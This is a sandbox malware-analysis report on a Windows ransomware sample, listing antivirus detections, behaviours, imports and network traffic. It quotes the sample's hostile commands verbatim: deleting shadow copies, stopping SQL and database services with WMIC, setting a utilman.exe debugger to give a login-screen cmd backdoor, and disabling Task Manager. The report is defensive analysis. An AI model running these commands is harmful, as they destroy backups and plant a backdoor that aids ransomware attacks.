Score: 8.8 (Critical)
SHA256: 25e7a047b79eb049df4b60224a2812a80a7fafc54ff789abc84ee7154a887a3c
File name: 4e3500cae131418b1a5603df026fbc0d.exe
Analysis duration: 84s
Latest analysis:
File size: 2.4MB
Static detection / dynamic detection labels: 0NA103L920 AI SCORE=100 BETACIO EOGJL FILECODER FILECRYPTER GENERIC@ML GENERICRXAA GENETIC GOGOOGLE HHAEJW HIGH CONFIDENCE MALWARE@#2BV4VK27UCXSW MOEVD+N0ICKQ N0DVQIEAU OCCAMY PEGB RDMK SCORE STATIC AI SUSGEN SUSPICIOUS PE UNSAFE VIRRANSOM XPACK ZEXAF ZWW@AE0691G
鹰眼 (Hawkeye) engine
Not detected: no 鹰眼 engine result available
Static verdict
Antivirus engines
Engine        Result                              Scan date   Engine version
Alibaba       Trojan:Win32/Filecoder.f93e18b3     20190527    0.3.0.5
Baidu         (no detection)                      20190318    1.0.0.2
Avast         Win32:Malware-gen                   20201228    21.1.5827.0
Tencent       Win32.Trojan.Filecoder.Pegb         20201228    1.0.0.1
Kingsoft      (no detection)                      20201228    2017.9.26.565
McAfee        GenericRXAA-AA!4E3500CAE131         20201228    6.0.6.653
CrowdStrike   (no detection)                      20190702    1.0
Static indicators
Queries for the computer name (50 of 51 events shown)
Checks if process is being debugged by a debugger (11 events)
Uses Windows APIs to generate a cryptographic key (50 of 116 events shown)
Checks amount of memory in system; this can be used to detect virtual machines that have a low amount of memory available (1 event)
Time                 API                    Arguments   Status    Return   Repeated
1619432267.064086    GlobalMemoryStatusEx               success   1        0
The executable contains unknown PE section names indicative of a packer (could be a false positive) (1 event)
section .symtab
Behavioral verdict
Dynamic indicators
Allocates read-write-execute memory (usually to unpack itself) (50 of 264 events shown)
Creates a shortcut to an executable file (1 event)
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
Creates a suspicious process (11 events)
cmdline "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%MSSQL%%'" call stopservice
cmdline "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%SQLWriter%%'" call stopservice
cmdline "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%SQLBrowser%%'" call stopservice
cmdline "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%ReportServer%%'" call stopservice
cmdline "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /f /v Debugger /t REG_SZ /d %windir%\system32\cmd.exe
cmdline "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%SQL%%'" call stopservice
cmdline powershell.exe -NoExit -Command -
cmdline "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%firebird%%'" call stopservice
cmdline "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%SQLAgent%%'" call stopservice
cmdline "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%MySQL%%'" call stopservice
cmdline "C:\Windows\System32\Wbem\WMIC.exe" SHADOWCOPY DELETE
Executes one or more WMI queries (9 events)
wmi SELECT * FROM Win32_Service WHERE name like '%%MySQL%%'
wmi SELECT * FROM Win32_Service WHERE name like '%%firebird%%'
wmi SELECT * FROM Win32_Service WHERE name like '%%SQLAgent%%'
wmi SELECT * FROM Win32_Service WHERE name like '%%SQL%%'
wmi SELECT * FROM Win32_Service WHERE name like '%%MSSQL%%'
wmi SELECT * FROM Win32_ShadowCopy
wmi SELECT * FROM Win32_Service WHERE name like '%%SQLWriter%%'
wmi SELECT * FROM Win32_Service WHERE name like '%%ReportServer%%'
wmi SELECT * FROM Win32_Service WHERE name like '%%SQLBrowser%%'
Checks for the Locally Unique Identifier on the system for a suspicious privilege (3 events)
Time                 API                     Arguments                                                 Status    Return   Repeated
1619432270.986086    LookupPrivilegeValueW   system_name: (empty); privilege_name: SeDebugPrivilege    success   1        0
1619432294.63743     LookupPrivilegeValueW   system_name: (empty); privilege_name: SeDebugPrivilege    success   1        0
1619432299.514258    LookupPrivilegeValueW   system_name: (empty); privilege_name: SeBackupPrivilege   success   1        0
Uses Windows utilities for basic Windows functionality (14 events)
cmdline "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe" /f /v Debugger /t REG_SZ /d "Hotkey Disabled"
cmdline "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%MSSQL%%'" call stopservice
cmdline "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%SQLWriter%%'" call stopservice
cmdline "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%SQLBrowser%%'" call stopservice
cmdline "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%ReportServer%%'" call stopservice
cmdline "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /f /v Debugger /t REG_SZ /d %windir%\system32\cmd.exe
cmdline "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%SQL%%'" call stopservice
cmdline "C:\Windows\system32\net.exe" view OSKAR-PC
cmdline "C:\Windows\system32\net.exe" view
cmdline "C:\Windows\system32\net.exe" view SANDBOXSandboxserverSambaUbuntu
cmdline "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%firebird%%'" call stopservice
cmdline "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%SQLAgent%%'" call stopservice
cmdline "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%MySQL%%'" call stopservice
cmdline "C:\Windows\System32\Wbem\WMIC.exe" SHADOWCOPY DELETE
Network communication
Communicates with host for which no DNS query was performed (1 event)
host 172.217.24.14
Installs itself for autorun at Windows startup (2 events)
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe\Debugger reg_value %windir%\system32\cmd.exe
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe\Debugger reg_value Hotkey Disabled
One or more non-safelisted processes were created (15 events)
parent_process powershell.exe martian_process "C:\Windows\system32\net.exe" view OSKAR-PC
parent_process powershell.exe martian_process "C:\Windows\system32\net.exe" view
parent_process powershell.exe martian_process "C:\Windows\system32\net.exe" view SANDBOXSandboxserverSambaUbuntu
parent_process powershell.exe martian_process "C:\Windows\system32\vssadmin.exe" Delete Shadows /All /Quiet
parent_process powershell.exe martian_process "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%MSSQL%%'" call stopservice
parent_process powershell.exe martian_process "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%SQLWriter%%'" call stopservice
parent_process powershell.exe martian_process "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%SQLBrowser%%'" call stopservice
parent_process powershell.exe martian_process "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%ReportServer%%'" call stopservice
parent_process powershell.exe martian_process "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /f /v Debugger /t REG_SZ /d %windir%\system32\cmd.exe
parent_process powershell.exe martian_process "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%SQL%%'" call stopservice
parent_process powershell.exe martian_process "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe" /f /v Debugger /t REG_SZ /d "Hotkey Disabled"
parent_process powershell.exe martian_process "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%firebird%%'" call stopservice
parent_process powershell.exe martian_process "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%SQLAgent%%'" call stopservice
parent_process powershell.exe martian_process "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%MySQL%%'" call stopservice
parent_process powershell.exe martian_process "C:\Windows\System32\Wbem\WMIC.exe" SHADOWCOPY DELETE
Uses suspicious command line tools or Windows utilities (1 event)
cmdline "C:\Windows\system32\vssadmin.exe" Delete Shadows /All /Quiet
The process powershell.exe wrote an executable file to disk (4 events)
file C:\Windows\System32\net.exe
file C:\Windows\System32\wbem\WMIC.exe
file C:\Windows\System32\vssadmin.exe
file C:\Windows\System32\reg.exe
Detects the presence of Wine emulator (1 event)
Time & API Arguments Status Return Repeated
1619426979.831241
LdrGetProcedureAddress
ordinal: 0
module: ntdll
module_address: 0x77d30000
function_address: 0x0018fe3d
function_name: wine_get_version
failed 3221225785 0
Executes one or more WMI queries which can be used to create or modify services (8 events)
wmi SELECT * FROM Win32_Service WHERE name like '%%MySQL%%'
wmi SELECT * FROM Win32_Service WHERE name like '%%firebird%%'
wmi SELECT * FROM Win32_Service WHERE name like '%%SQLAgent%%'
wmi SELECT * FROM Win32_Service WHERE name like '%%SQL%%'
wmi SELECT * FROM Win32_Service WHERE name like '%%MSSQL%%'
wmi SELECT * FROM Win32_Service WHERE name like '%%SQLWriter%%'
wmi SELECT * FROM Win32_Service WHERE name like '%%ReportServer%%'
wmi SELECT * FROM Win32_Service WHERE name like '%%SQLBrowser%%'
File has been identified by 50 AntiVirus engines on VirusTotal as malicious (50 events)
Elastic malicious (high confidence)
MicroWorld-eScan Gen:Variant.Betacio.381
FireEye Generic.mg.4e3500cae131418b
ALYac Trojan.Ransom.Filecoder
Cylance Unsafe
K7AntiVirus Riskware ( 0040eff71 )
Alibaba Trojan:Win32/Filecoder.f93e18b3
K7GW Riskware ( 0040eff71 )
Cybereason malicious.ae1314
Arcabit Trojan.Betacio.381
Symantec Downloader
APEX Malicious
Avast Win32:Malware-gen
ClamAV Win.Packed.Generic-7647403-0
Kaspersky HEUR:Trojan.Win32.Generic
BitDefender Gen:Variant.Betacio.381
NANO-Antivirus Trojan.Win32.Filecoder.hhaejw
Paloalto generic.ml
AegisLab Trojan.Win32.Generic.4!c
Tencent Win32.Trojan.Filecoder.Pegb
Ad-Aware Gen:Variant.Betacio.381
Sophos Mal/Generic-S
Comodo Malware@#2bv4vk27ucxsw
F-Secure Trojan.TR/Crypt.XPACK.Gen
DrWeb Trojan.Encoder.31607
VIPRE Trojan.Win32.Generic!BT
TrendMicro TROJ_FRS.0NA103L920
McAfee-GW-Edition BehavesLike.Win32.VirRansom.vh
Emsisoft Gen:Variant.Betacio.381 (B)
Ikarus Trojan-Ransom.FileCrypter
Jiangmin Trojan.Generic.eogjl
Avira TR/Crypt.XPACK.Gen
Microsoft Trojan:Win32/Occamy.C25
ZoneAlarm HEUR:Trojan.Win32.Generic
GData Gen:Variant.Betacio.381
Cynet Malicious (score: 100)
AhnLab-V3 Trojan/Win32.Agent.C4176348
McAfee GenericRXAA-AA!4E3500CAE131
MAX malware (ai score=100)
VBA32 Trojan.Encoder
ESET-NOD32 a variant of Win32/Filecoder.GoGoogle.A
TrendMicro-HouseCall TROJ_FRS.0NA103L920
Rising Trojan.Generic@ML.95 (RDMK:n0DvQiEau/moevd+n0ICkQ)
SentinelOne Static AI - Suspicious PE
MaxSecure Trojan.Malware.7164915.susgen
Fortinet W32/Crypt.BC0D!tr.ransom
BitDefenderTheta Gen:NN.ZexaF.34700.zwW@ae0691g
AVG Win32:Malware-gen
Panda Trj/Genetic.gen
Qihoo-360 Win32/Trojan.e6d
Visual analysis
Binary image
No binary image: no binary visualization image was generated for this sample.
Runtime screenshots
No runtime screenshots: no screenshots were generated while the sample ran.


PE Compile Time

1970-01-01 08:00:00

Imports

Library kernel32.dll:
0x652020 WriteFile
0x652024 WriteConsoleW
0x65202c WaitForSingleObject
0x652030 VirtualQuery
0x652034 VirtualFree
0x652038 VirtualAlloc
0x65203c SwitchToThread
0x652040 SuspendThread
0x652044 SetWaitableTimer
0x652050 SetEvent
0x652054 SetErrorMode
0x65205c ResumeThread
0x652064 LoadLibraryA
0x652068 LoadLibraryW
0x65206c SetThreadContext
0x652070 GetThreadContext
0x652074 GetSystemInfo
0x652078 GetSystemDirectoryA
0x65207c GetStdHandle
0x652088 GetProcAddress
0x652090 GetConsoleMode
0x652098 ExitProcess
0x65209c DuplicateHandle
0x6520a0 CreateThread
0x6520a8 CreateEventA
0x6520ac CloseHandle

Hosts

No hosts contacted.

TCP

Source Source Port Destination Destination Port
192.168.56.101 49177 192.168.56.1 139
192.168.56.101 49178 192.168.56.1 139

UDP

Source Source Port Destination Destination Port
192.168.56.1 137 192.168.56.101 137
192.168.56.1 138 192.168.56.101 138
192.168.56.101 50534 114.114.114.114 53
192.168.56.101 51963 114.114.114.114 53
192.168.56.101 56539 114.114.114.114 53
192.168.56.101 65004 114.114.114.114 53
192.168.56.101 137 192.168.56.255 137
192.168.56.101 138 192.168.56.255 138
192.168.56.101 49235 224.0.0.252 5355
192.168.56.101 51378 224.0.0.252 5355
192.168.56.101 51808 224.0.0.252 5355
192.168.56.101 53237 224.0.0.252 5355
192.168.56.101 56804 224.0.0.252 5355
192.168.56.101 60123 224.0.0.252 5355
192.168.56.101 62191 224.0.0.252 5355
192.168.56.101 1900 239.255.255.250 1900
192.168.56.101 50535 239.255.255.250 3702
192.168.56.101 56540 239.255.255.250 3702
192.168.56.101 56807 239.255.255.250 1900
192.168.56.101 58707 239.255.255.250 3702

HTTP & HTTPS Requests

No HTTP requests performed.

ICMP traffic

No ICMP traffic performed.

IRC traffic

No IRC requests performed.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Snort Alerts

No Snort Alerts

Sorry! No dropped files.
Sorry! No dropped buffers.